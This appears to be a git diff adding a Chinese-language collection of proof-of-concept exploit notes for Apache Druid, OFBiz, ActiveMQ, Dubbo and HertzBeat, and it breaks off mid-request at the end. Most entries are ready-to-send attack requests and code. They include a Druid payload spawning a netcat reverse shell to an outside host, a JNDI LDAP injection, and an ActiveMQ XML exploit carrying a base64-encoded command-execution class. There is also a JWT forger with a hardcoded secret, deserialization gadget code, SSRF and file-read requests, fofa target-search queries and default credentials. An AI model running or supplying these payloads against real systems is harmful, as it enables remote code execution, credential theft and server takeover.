+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
+Accept: application/json, text/plain, */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/json
+Content-Length: 1008
+Connection: close
+
+
+{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-2-1T14:12:24.050Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec(' nc xxx.xxx.xxx.xxx 9999 -e /bin/sh')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}
+```
+
+
+
+> 更新: 2024-06-17 09:22:47  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zwuks85vtb3xvff4>
\ No newline at end of file
diff --git a/ApaceDruid存在远程命令执行漏洞(CVE-2023-25194).md b/ApaceDruid存在远程命令执行漏洞(CVE-2023-25194).md
new file mode 100644
index 0000000..b70cafb
--- /dev/null
+++ b/ApaceDruid存在远程命令执行漏洞(CVE-2023-25194).md
@@ -0,0 +1,83 @@
+# Apace Druid存在 远程命令执行漏洞(CVE-2023-25194)
+
+# 一、漏洞简介
+<font style="color:rgb(36, 41, 46);">Apache Druid是一个实时分析型数据库，旨在对大型数据集进行快速的查询分析（"OLAP"查询)。Druid最常被当做数据库来用以支持实时摄取、高性能查询和高稳定运行的应用场景，同时，Druid也通常被用来助力分析型应用的图形化界面，或者当做需要快速聚合的高并发后端API，Druid最适合应用于面向事件类型的数据。Apace Druid存在 远程命令执行漏洞(CVE-2023-25194)</font>
+
+# <font style="color:rgb(36, 41, 46);">二、影响版本</font>
++ 0.19.0 <= Apache Druid <= 25.0.0
+
+# 三、资产测绘
+```java
+title="Apache Druid"
+```
+
+![1718117306587-20ca98cb-dc58-4025-8a8b-2a7a2a1ee289.png](./img/XPRtC17bmvqPfx-1/1718117306587-20ca98cb-dc58-4025-8a8b-2a7a2a1ee289-439817.png)
+
+# 四、漏洞复现
+```java
+POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
+Host: 
+Content-Length: 1400
+Accept: application/json, text/plain, */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
+Content-Type: application/json
+Origin: http://vps:8888
+Referer: http://vps:8888/unified-console.html
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: pZaf_2132_ulastactivity=050484OuqAxDqETcOja26QKgFkE4HbrlSk4NbAkGRg9oNLIbkCUN; pZaf_2132_nofavfid=1; pZaf_2132_smile=1D1; pZaf_2132_home_readfeed=1682214968; pZaf_2132_lastviewtime=1%7C1682215445; pZaf_2132_lastcheckfeed=1%7C1682217817; kOJf_2132_saltkey=MGWItu8r; kOJf_2132_lastvisit=1683339017; kOJf_2132_ulastactivity=27e4qsFumyqDRGo03vcLLEHChJmZRharD1jfbUJnU1NIIIrbB8UL; kOJf_2132_nofavfid=1; kOJf_2132_lastcheckfeed=1%7C1683342726; PHPSESSID=3543e022151ed94117e84216
+Connection: close
+
+{
+    "type":"kafka",
+    "spec":{
+        "type":"kafka",
+        "ioConfig":{
+            "type":"kafka",
+            "consumerProperties":{
+                "bootstrap.servers":"127.0.0.1:6666",
+                "sasl.mechanism":"SCRAM-SHA-256",
+                "security.protocol":"SASL_SSL",
+                "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://wuriedscos.dgrh3.cn\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
+            },
+            "topic":"test",
+            "useEarliestOffset":true,
+            "inputFormat":{
+                "type":"regex",
+                "pattern":"([\\s\\S]*)",
+                "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
+                "columns":[
+                    "raw"
+                ]
+            }
+        },
+        "dataSchema":{
+            "dataSource":"sample",
+            "timestampSpec":{
+                "column":"!!!_no_such_column_!!!",
+                "missingValue":"1970-01-01T00:00:00Z"
+            },
+            "dimensionsSpec":{
+
+            },
+            "granularitySpec":{
+                "rollup":false
+            }
+        },
+        "tuningConfig":{
+            "type":"kafka"
+        }
+    },
+    "samplerConfig":{
+        "numRows":500,
+        "timeoutMs":15000
+    }
+}
+```
+
+![1718119163845-f6728f22-d36c-4d3c-b141-603b89a28b4c.png](./img/XPRtC17bmvqPfx-1/1718119163845-f6728f22-d36c-4d3c-b141-603b89a28b4c-459554.png)
+
+
+
+> 更新: 2024-06-17 09:22:47  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bfg6tey47m6g5aaa>
\ No newline at end of file
diff --git a/ApaceOFBizgetJSONuiLabelArray存在服务端请求伪造ssrf漏洞.md b/ApaceOFBizgetJSONuiLabelArray存在服务端请求伪造ssrf漏洞.md
new file mode 100644
index 0000000..c385390
--- /dev/null
+++ b/ApaceOFBizgetJSONuiLabelArray存在服务端请求伪造ssrf漏洞.md
@@ -0,0 +1,47 @@
+# Apace OFBiz getJSONuiLabelArray存在服务端请求伪造ssrf漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(36, 41, 46);">Apache OFBiz是一个非常著名的电子商务平台，是一个非常著名的开源项目，提供了创建基于最新J2EE/XML规范和技术标准，构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。Apace OFBiz getJSONuiLabelArray存在服务端请求伪造ssrf漏洞。</font>
+
+# <font style="color:rgb(36, 41, 46);">二、影响版本</font>
++ Apace OFBiz
+
+# 三、资产测绘
++ fofa`app="Apache_OFBiz"`
++ 特征
+
+![1704514365135-311b494b-09b2-413f-a8ec-93f13c5b2b53.png](./img/4TixQa4ZMwFFg4Du/1704514365135-311b494b-09b2-413f-a8ec-93f13c5b2b53-414907.png)
+
+# 四、漏洞复现
+1. 获取dnslog地址
+
+```plain
+v3f9em.dnslog.cn
+```
+
+![1704514419059-66d8b314-0740-451a-b678-7e22e50ebc03.png](./img/4TixQa4ZMwFFg4Du/1704514419059-66d8b314-0740-451a-b678-7e22e50ebc03-246109.png)
+
+2. 测试是否存在漏洞
+
+```plain
+POST /partymgr/control/getJSONuiLabelArray HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
+Content-Length: 79
+Accept-Encoding: gzip, deflate
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+
+requiredLabels={"https://v3f9em.dnslog.cn/api":["2aZ6okJyCI0H8XLAUeiv9Yu3wOK"]}
+```
+
+![1704514461121-2657a5fc-cf77-4b35-8857-1069d87ccd00.png](./img/4TixQa4ZMwFFg4Du/1704514461121-2657a5fc-cf77-4b35-8857-1069d87ccd00-991338.png)
+
+![1704514477535-9277697c-782c-4d32-b5d3-c94147c4b724.png](./img/4TixQa4ZMwFFg4Du/1704514477535-9277697c-782c-4d32-b5d3-c94147c4b724-582845.png)
+
+[apache-OFBiz-getjsonuilabelarray-服务端请求伪造.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222253157-27d1351f-0247-4560-b9a5-3c8db0b44532.yaml)
+
+
+
+> 更新: 2024-02-29 23:57:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ciyvexuvwfhmzuq5>
\ No newline at end of file
diff --git a/Apache-ActiveMQ远程命令执行漏洞.md b/Apache-ActiveMQ远程命令执行漏洞.md
new file mode 100644
index 0000000..07deb5e
--- /dev/null
+++ b/Apache-ActiveMQ远程命令执行漏洞.md
@@ -0,0 +1,48 @@
+## Apache ActiveMQ远程命令执行漏洞
+
+## 影响版本
+```
+5.18.0<=Apache ActiveMQ<5.18.3
+5.17.0<=Apache ActiveMQ<5.17.6
+5.16.0<=Apache ActiveMQ<5.16.7
+5.15.0<=Apache ActiveMQ<5.15.15
+```
+## fofa
+```
+app="APACHE-ActiveMQ" && port="61616"
+```
+## ActiveMqRCE 有回显
+```
+https://github.com/Hutt0n0/ActiveMqRCE
+
+```
+## 11.16号新增有回显的命令执行exp
+```
+
+<?xml version="1.0" encoding="UTF-8" ?>
+<beans xmlns="http://www.springframework.org/schema/beans"
+       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:spring="http://camel.apache.org/schema/spring"
+       xmlns:context="http://www.springframework.org/schema/context"
+       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd http://camel.apache.org/schema/spring http://camel.apache.org/schema/spring/camel-spring.xsd http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context.xsd">
+    <context:property-placeholder ignore-resource-not-found="false" ignore-unresolvable="false"/>
+
+    <bean  class="#{T(org.springframework.cglib.core.ReflectUtils).defineClass('CMDResponse',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAADQAtgoAKgBhCABiCABjCgBkAGUKAA0AZggAZwoADQBoCABpCABqCABrCABsBwBtBwBuCgAMAG8KAAwAcAoAcQByBwBzCgARAGEKAHQAdQoAEQB2CgARAHcKAA0AeAcAeQoAFwB6CgB7AHwIAH0KAH4AfwgARAoAfgCACgCBAIIKAIEAgwcAhAgAhQgASgcAhgoAIwCHCACICgANAIkKAIoAiwoAigCMBwCNBwCOAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAA1MQ01EUmVzcG9uc2U7AQAEdGVzdAEAFShMamF2YS9sYW5nL1N0cmluZzspVgEADnByb2Nlc3NCdWlsZGVyAQAaTGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcjsBAAVzdGFydAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAAtpbnB1dFN0cmVhbQEAFUxqYXZhL2lvL0lucHV0U3RyZWFtOwEAFWJ5dGVBcnJheU91dHB1dFN0cmVhbQEAH0xqYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbTsBAARyZWFkAQABSQEAAWUBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsBAAZ0aHJlYWQBABJMamF2YS9sYW5nL1RocmVhZDsBAAZhQ2xhc3MBABFMamF2YS9sYW5nL0NsYXNzOwEABnRhcmdldAEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAAl0cmFuc3BvcnQBADBMb3JnL2FwYWNoZS9hY3RpdmVtcS90cmFuc3BvcnQvdGNwL1RjcFRyYW5zcG9ydDsBAAdhQ2xhc3MxAQALc29ja2V0ZmllbGQBAAZzb2NrZXQBABFMamF2YS9uZXQvU29ja2V0OwEADG91dHB1dFN0cmVhbQEAFkxqYXZhL2lvL091dHB1dFN0cmVhbTsBAANjbWQBABJMamF2YS9sYW5nL1N0cmluZzsBAAZyZXN1bHQBAAdwcm9jZXNzAQADYXJnAQAWTG9jYWxWYXJpYWJsZVR5cGVUYWJsZQEAFExqYXZhL2xhbmcvQ2xhc3M8Kj47AQANU3RhY2tNYXBUYWJsZQcAbgcAjQcAbQcAjwcAkAcAcwcAeQEACkV4Y2VwdGlvbnMHAJEBAApTb3VyY2VGaWxlAQAQQ01EUmVzcG9uc2UuamF2YQwAKwAsAQAAAQAHb3MubmFtZQcAkgwAkwCUDACVAJYBAAd3aW5kb3dzDACXAJgBAAdjbWQuZXhlAQACL2MBAAcvYmluL3NoAQACLWMBABhqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXIBABBqYXZhL2xhbmcvU3RyaW5nDAArAJkMADYAmgcAjwwAmwCcAQAdamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW0HAJAMADwAnQwAngCfDACgAKEMACsAogEAE2phdmEvbGFuZy9FeGNlcHRpb24MAKMAlgcApAwApQCmAQAQamF2YS5sYW5nLlRocmVhZAcApwwAqACpDACqAKsHAKwMAK0ArgwArwCwAQAub3JnL2FwYWNoZS9hY3RpdmVtcS90cmFuc3BvcnQvdGNwL1RjcFRyYW5zcG9ydAEALm9yZy5hcGFjaGUuYWN0aXZlbXEudHJhbnNwb3J0LnRjcC5UY3BUcmFuc3BvcnQBAA9qYXZhL25ldC9Tb2NrZXQMALEAsgEAAQoMALMAoQcAtAwAngCiDAC1ACwBAAtDTURSZXNwb25zZQEAEGphdmEvbGFuZy9PYmplY3QBABFqYXZhL2xhbmcvUHJvY2VzcwEAE2phdmEvaW8vSW5wdXRTdHJlYW0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAAt0b0xvd2VyQ2FzZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAHaW5kZXhPZgEAFShMamF2YS9sYW5nL1N0cmluZzspSQEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBABUoKUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQADKClJAQAFd3JpdGUBAAQoSSlWAQALdG9CeXRlQXJyYXkBAAQoKVtCAQAFKFtCKVYBAApnZXRNZXNzYWdlAQAQamF2YS9sYW5nL1RocmVhZAEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwEAD2phdmEvbGFuZy9DbGFzcwEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQANc2V0QWNjZXNzaWJsZQEABChaKVYBAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAD2dldE91dHB1dFN0cmVhbQEAGCgpTGphdmEvaW8vT3V0cHV0U3RyZWFtOwEACGdldEJ5dGVzAQAUamF2YS9pby9PdXRwdXRTdHJlYW0BAAVjbG9zZQAhACkAKgAAAAAAAgABACsALAABAC0AAAAvAAEAAQAAAAUqtwABsQAAAAIALgAAAAYAAQAAAAcALwAAAAwAAQAAAAUAMAAxAAAAAQAyADMAAgAtAAAC5wAGAA0AAAD7EgJNEgJOEgI6BBIDuAAEtgAFEga2AAebAA0SCE4SCToEpwAKEgpOEgs6BLsADFkGvQANWQMtU1kEGQRTWQUrU7cADjoFGQW2AA86BhkGtgAQOge7ABFZtwASOggDNgkZB7YAE1k2CQKfAA0ZCBUJtgAUp//tuwANWRkItgAVtwAWTacACzoFGQW2ABhNuAAZOgUSGrgAGzoGGQYSHLYAHToHGQcEtgAeGQcZBbYAH8AAIDoIEiG4ABs6CRkJEiK2AB06ChkKBLYAHhkKGQi2AB/AACM6CxkLtgAkOgwZDBIltgAmtgAnGQwstgAmtgAnGQy2ACinAAU6BbEAAgArAIIAhQAXAI0A9QD4ABcABAAuAAAAjgAjAAAACwADAAwABgANAAoADgAaAA8AHQAQACQAEgAnABMAKwAWAEUAFwBMABgAUwAZAFwAGgBfABsAawAcAHUAHgCCACEAhQAfAIcAIACNACQAkgAlAJkAJgCiACcAqAAoALQAKQC7ACoAxAArAMoALADWAC0A3QAuAOcALwDwADAA9QAzAPgAMQD6ADgALwAAAMAAEwBFAD0ANAA1AAUATAA2ADYANwAGAFMALwA4ADkABwBcACYAOgA7AAgAXwAjADwAPQAJAIcABgA+AD8ABQCSAGMAQABBAAUAmQBcAEIAQwAGAKIAUwBEAEUABwC0AEEARgBHAAgAuwA6AEgAQwAJAMQAMQBJAEUACgDWAB8ASgBLAAsA3QAYAEwATQAMAAAA+wAwADEAAAAAAPsATgBPAAEAAwD4AFAATwACAAYA9QBRAE8AAwAKAPEAUgBPAAQAUwAAABYAAgCZAFwAQgBUAAYAuwA6AEgAVAAJAFUAAABUAAj+ACQHAFYHAFYHAFYG/wAzAAoHAFcHAFYHAFYHAFYHAFYHAFgHAFkHAFoHAFsBAAAV/wAPAAUHAFcHAFYHAFYHAFYHAFYAAQcAXAf3AGoHAFwBAF0AAAAEAAEAXgABAF8AAAACAGA='),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).newInstance().test('ls')}">
+    </bean>
+</beans>
+```
+## 漏洞回显复现
+![](./assets/20231117150110.png)
+
+
+## 漏洞脚本
+```
+https://github.com/Fw-fW-fw/activemq_Throwable
+https://github.com/sincere9/Apache-ActiveMQ-RCE
+https://github.com/X1r0z/ActiveMQ-RCE
+```
+
+## 漏洞分析
+```
+https://paper.seebug.org/3058/
+https://mp.weixin.qq.com/s/4n7vyeXLtim0tXcjnSWDAw
+```
diff --git a/Apache-Dubbo-admin-authorized-bypass-(CNVD-2023-96546).md b/Apache-Dubbo-admin-authorized-bypass-(CNVD-2023-96546).md
new file mode 100644
index 0000000..3dfa011
--- /dev/null
+++ b/Apache-Dubbo-admin-authorized-bypass-(CNVD-2023-96546).md
@@ -0,0 +1,71 @@
+## Apache Dubbo-admin-authorized-bypass (CNVD-2023-96546)
+
+
+## exp
+```java
+package org.apache.dubbo.admin.controller;
+
+import io.jsonwebtoken.Jwts;
+import io.jsonwebtoken.SignatureAlgorithm;
+
+import java.util.Date;
+import java.util.HashMap;
+import java.util.Map;
+
+public class jwt {
+    public static String generateToken(String rootUserName) {
+        String secret = "86295dd0c4ef69a1036b0b0c15158d77";
+        Long timeStamp = 9999999999999L;
+        Date date = new Date(timeStamp);
+        final SignatureAlgorithm defaultAlgorithm = SignatureAlgorithm.HS512;
+        Map<String, Object> claims = new HashMap<>(1);
+        claims.put("sub", rootUserName);
+        return Jwts.builder()
+                .setClaims(claims)
+                .setExpiration(date)
+                .setIssuedAt(new Date(System.currentTimeMillis()))
+                .signWith(defaultAlgorithm, secret)
+                .compact();
+    }
+    public static void main(String[] args) {
+        String root = jwt.generateToken("root");
+        System.out.println(root);
+
+
+    }
+}
+```
+
+## nuclei
+```
+id: dubbo-admin_Unauthorized_bypass
+info:
+  name: Template Name
+  author: 
+  severity: medium
+  description: dubbo-admin Unauthorized access bypass
+  reference:
+    - https://
+  tags: apache,dubbo-admin
+requests:
+  - raw:
+      - |+
+        GET /api/dev/consumers HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json, text/plain, */*
+        Authorization: eyJhbGciOiJIUzUxMiJ9.eyJleHAiOjk5OTk5OTk5OTksInN1YiI6InJvb3QiLCJpYXQiOjE2OTkwODM2Mzd9.wKRqJkWxr_nVDcVVF5rniqhnACtqaDnYUUu55g-atkIwRIt1A-SMpKqBN5zrGZl4kFVcrjzMvXsYqfqf0N9Gbg
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
+        Referer: http://{{Hostname}}/
+        Accept-Encoding: gzip, deflate
+        Accept-Language: zh-CN,zh;q=0.9
+        Connection: close
+
+    matchers:
+      - type: word
+        part: header
+        words:
+          - 'HTTP/1.1 200 '
+```
+
+## 漏洞来源
+- https://mp.weixin.qq.com/s/Wsdx_qi1PeiDwbF_YadoOQ
diff --git a/Apache-Dubbo-反序列化漏洞(CVE-2023-29234).md b/Apache-Dubbo-反序列化漏洞(CVE-2023-29234).md
new file mode 100644
index 0000000..3257a10
--- /dev/null
+++ b/Apache-Dubbo-反序列化漏洞(CVE-2023-29234).md
@@ -0,0 +1,99 @@
+## Apache Dubbo 反序列化漏洞（CVE-2023-29234）
+
+Apache Dubbo 是一款微服务开发框架，它提供了RPC通信与微服务治理两大关键能力。使应用可通过高性能的 RPC 实现服务的输出和输入功能，可以和 Spring 框架无缝集成。
+Apache Dubbo 某些版本在解码恶意包时存在反序列化漏洞，远程攻击者可利用该漏洞执行任意代码。
+
+## 影响版本
+```
+3.1.0<=Apache Dubbo<=3.1.10
+3.2.0<=Apache Dubbo<=3.2.4
+```
+
+## 利用方式一：fake server
+```
+@Override
+    protected void encodeResponseData(Channel channel, ObjectOutput out, Object data, String version) throws IOException {
+        Result result = (Result) data;
+        // currently, the version value in Response records the version of Request
+        boolean attach = Version.isSupportResponseAttachment(version);
+//         Throwable th = result.getException();   
+         Object th = null;  // 利用点： 用于 toString 的 gadget chain
+         try {
+                th = getThrowablePayload("open -a calculator");
+            } catch (Exception e) {
+
+            }
+
+        if (th == null) {
+            Object ret = result.getValue();
+            if (ret == null) {
+                out.writeByte(attach ? RESPONSE_NULL_VALUE_WITH_ATTACHMENTS : RESPONSE_NULL_VALUE);
+            } else {
+                out.writeByte(attach ? RESPONSE_VALUE_WITH_ATTACHMENTS : RESPONSE_VALUE);   
+                out.writeObject(ret);   
+            }
+        } else {
+            out.writeByte(attach ? RESPONSE_WITH_EXCEPTION_WITH_ATTACHMENTS : RESPONSE_WITH_EXCEPTION);
+//            out.writeThrowable(th); 
+            out.writeObject(th);    // 直接序列化对象即可
+        }
+
+        if (attach) {
+            // returns current version of Response to consumer side.
+            result.getObjectAttachments().put(DUBBO_VERSION_KEY, Version.getProtocolVersion());
+            out.writeAttachments(result.getObjectAttachments());
+        }
+    }
+```
+
+## 利用方式二：客户端打服务端
+```
+public static void main(String[] args) throws Exception {
+
+        ByteArrayOutputStream boos = new ByteArrayOutputStream();
+        ByteArrayOutputStream nativeJavaBoos = new ByteArrayOutputStream();
+        Serialization serialization = new NativeJavaSerialization();
+        NativeJavaObjectOutput out = new NativeJavaObjectOutput(nativeJavaBoos);
+
+        // header.
+        byte[] header = new byte[HEADER_LENGTH];
+        // set magic number.
+        Bytes.short2bytes(MAGIC, header);
+        // set request and serialization flag.
+        header[2] = serialization.getContentTypeId();
+
+        header[3] = Response.OK;
+        Bytes.long2bytes(1, header, 4);
+
+        // result
+        Object exp = getThrowablePayload("open -a calculator"); // Rome toString 利用链
+        out.writeByte(RESPONSE_WITH_EXCEPTION);
+        out.writeObject(exp);
+
+        out.flushBuffer();
+
+        Bytes.int2bytes(nativeJavaBoos.size(), header, 12);
+        boos.write(header);
+        boos.write(nativeJavaBoos.toByteArray());
+
+        byte[] responseData = boos.toByteArray();
+
+        Socket socket = new Socket("127.0.0.1", 20880);
+        OutputStream outputStream = socket.getOutputStream();
+        outputStream.write(responseData);
+        outputStream.flush();
+        outputStream.close();
+    }
+
+    protected static Object getThrowablePayload(String command) throws Exception {
+        Object o = Gadgets.createTemplatesImpl(command);
+        ObjectBean delegate = new ObjectBean(Templates.class, o);
+
+        return delegate;
+    }
+```
+![image](https://github.com/wy876/POC/assets/139549762/707361a3-2f27-415f-a0d0-db935bfbcd2f)
+
+## 漏洞来源
+- https://xz.aliyun.com/t/13187#toc-3
+- https://github.com/RacerZ-fighting/DubboPOC
diff --git a/Apache-HertzBeat-SnakeYaml反序列化漏洞(CVE-2024-42323).md b/Apache-HertzBeat-SnakeYaml反序列化漏洞(CVE-2024-42323).md
new file mode 100644
index 0000000..07054ed
--- /dev/null
+++ b/Apache-HertzBeat-SnakeYaml反序列化漏洞(CVE-2024-42323).md
@@ -0,0 +1,23 @@
+# Apache-HertzBeat-SnakeYaml反序列化漏洞(CVE-2024-42323)
+
+Apache HertzBeat 是开源的实时监控工具。受影响版本中由于使用漏洞版本的 SnakeYAML v1.32解析用户可控的 yaml 文件，经过身份验证的攻击者可通过 /api/monitors/import、/api/alert/defines/import 接口新增监控类型时配置恶意的 yaml 脚本远程执行任意代码。
+
+## 漏洞复现
+
+访问http://localhost:4200/，admin/hertzbeat登录后台，选择任何监控点击导入监控
+
+![image-20241009211426283.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410250931543.png)
+
+修改上传yaml文件中的value值：
+
+![image-20241009211949488.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410250931481.png)
+
+成功执行代码
+
+![image-20241009211904763.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410250931374.png)
+
+
+
+## 漏洞来源
+
+- https://forum.butian.net/article/612
\ No newline at end of file
diff --git a/Apache-HertzBeat开源实时监控系统存在默认口令漏洞.md b/Apache-HertzBeat开源实时监控系统存在默认口令漏洞.md
new file mode 100644
index 0000000..6d66665
--- /dev/null
+++ b/Apache-HertzBeat开源实时监控系统存在默认口令漏洞.md
@@ -0,0 +1,18 @@
+# Apache-HertzBeat开源实时监控系统存在默认口令漏洞
+HertzBeat(赫兹跳动) 是一个开源实时监控系统，无需Agent，性能集群，兼容Prometheus，自定义监控和状态页构建能力。HertzBeat 的强大自定义，多类型支持，高性能，易扩展，希望能帮助用户快速构建自有监控系统。HertzBeat(赫兹跳动) 开源实时监控系统存在默认口令漏洞。
+
+## fofa
+
+```javascript
+app="HertzBeat-实时监控系统"
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731984344118-f35cf51e-396b-4c72-958e-32a2ce31f18e.png)
+
+## poc
+```java
+默认账号密码 admin/hertzbeat
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731984356948-93102e68-6ce3-49cd-8bb6-44ceb8143325.png)
+
diff --git a/Apache-OFBiz-SSRF-&&-任意配置读取.md b/Apache-OFBiz-SSRF-&&-任意配置读取.md
new file mode 100644
index 0000000..e2d4059
--- /dev/null
+++ b/Apache-OFBiz-SSRF-&&-任意配置读取.md
@@ -0,0 +1,50 @@
+## Apache OFBiz SSRF && 任意配置读取
+
+
+## 任意文件读取漏洞 poc
+以读取 applications/accounting/config/payment.properties 中的几个 key 为例
+
+```
+POST /webtools/control/getJSONuiLabelArray/?USERNAME=&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Cache-Control: no-cache
+Pragma: no-cache
+Host: 
+Content-type: application/x-www-form-urlencoded
+Content-Length: 148
+
+requiredLabels={"file:applications/accounting/config/payment.properties":["payment.verisign.user","payment.verisign.pwd","payment.verisign.vendor"]}
+```
+![image](https://github.com/wy876/POC/assets/139549762/093b6ca3-2917-4607-93a0-efaf2b3e2ca8)
+
+## SSRF 
+```
+POST /webtools/control/getJSONuiLabelArray/?USERNAME=&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Cache-Control: no-cache
+Pragma: no-cache
+Host: 
+Content-type: application/x-www-form-urlencoded
+Content-Length: 148
+
+requiredLabels={"http://127.0.0.1/":["xxxxxx"]}
+````
+
+这里随便写一个 properties 文件，然后 python -m http.server 8000 起个服务
+![image](https://github.com/wy876/POC/assets/139549762/683a3f21-0405-43f1-9d51-a44752107432)
+
+![image](https://github.com/wy876/POC/assets/139549762/7f5e826e-9564-4343-bf1e-d0d530ab7a3a)
+
+![image](https://github.com/wy876/POC/assets/139549762/beb30398-fa1b-4028-98f9-b3e8ccb4d90e)
+
+
+
+
+## 漏洞来源
+- https://xz.aliyun.com/t/13211
diff --git a/Apache-OFBiz-身份验证绕过漏洞-(CVE-2023-51467).md b/Apache-OFBiz-身份验证绕过漏洞-(CVE-2023-51467).md
new file mode 100644
index 0000000..bd8c02c
--- /dev/null
+++ b/Apache-OFBiz-身份验证绕过漏洞-(CVE-2023-51467).md
@@ -0,0 +1,86 @@
+## Apache OFBiz 身份验证绕过漏洞 (CVE-2023-51467)
+
+ Apache OFBiz 在后台提供了执行groovy 代码的功能，但是由于存在认证绕过问题，攻击者可构造恶意请求绕过身份认证，利用后台相关接口功能执行groovy代码，执行任意命令，控制服务器。
+
+
+## fofa
+```
+app="Apache_OFBiz"
+```
+
+## poc
+```
+POST /webtools/control/ProgramExport?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
+Host: 127.0.0.1:8443
+Cookie: OFBiz.Visitor=10100
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
